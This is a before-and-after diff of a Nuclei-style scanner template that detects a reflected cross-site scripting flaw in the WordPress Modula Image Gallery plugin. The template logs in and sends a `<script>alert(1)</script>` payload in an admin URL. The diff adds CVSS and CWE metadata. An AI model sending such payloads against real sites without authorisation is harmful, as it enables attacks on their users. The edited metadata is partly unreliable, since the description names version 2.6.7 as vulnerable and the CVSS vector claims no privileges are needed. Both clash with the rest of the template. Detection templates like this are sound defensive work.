vulnerabilities/wordpress/modula-image-gallery-xss.yaml (before)
id: modula-image-gallery-xss

info:
  name: Modula Image Gallery < 2.6.7 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/ee248078-89ee-4cc0-b0fe-e932cd00db3e
    - https://wordpress.org/plugins/modula-best-grid-gallery
  metadata:
    verified: true
  tags: authenticated,wpscan,wp-plugin,xss,wp,wordpress

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/edit.php?post_type=modula-gallery&page=modula-addons&a"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '&a\"><script>alert(1)</script>&extensions='

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

vulnerabilities/wordpress/modula-image-gallery-xss.yaml (after)
id: modula-image-gallery-xss

info:
  name: WordPress Modula Image Gallery <2.6.7 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: WordPress Modula Image Gallery 2.6.7 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
  reference:
    - https://wpscan.com/vulnerability/ee248078-89ee-4cc0-b0fe-e932cd00db3e
    - https://wordpress.org/plugins/modula-best-grid-gallery
  metadata:
    verified: true
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: authenticated,wpscan,wp-plugin,xss,wp,wordpress

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/edit.php?post_type=modula-gallery&page=modula-addons&a"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '&a\"><script>alert(1)</script>&extensions='

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/07

vulnerabilities/wordpress/modula-image-gallery-xss.yaml (diff)
@@ -1,15 +1,19 @@
 id: modula-image-gallery-xss
 
 info:
-  name: Modula Image Gallery < 2.6.7 - Reflected Cross-Site Scripting
+  name: WordPress Modula Image Gallery <2.6.7 - Cross-Site Scripting
   author: Akincibor
   severity: medium
-  description: The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
+  description: WordPress Modula Image Gallery 2.6.7 does not escape some URLs before outputting them back in attributes, leading to reflected cross-site scripting.
   reference:
     - https://wpscan.com/vulnerability/ee248078-89ee-4cc0-b0fe-e932cd00db3e
     - https://wordpress.org/plugins/modula-best-grid-gallery
   metadata:
     verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: authenticated,wpscan,wp-plugin,xss,wp,wordpress
 
 requests:
@@ -42,3 +46,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
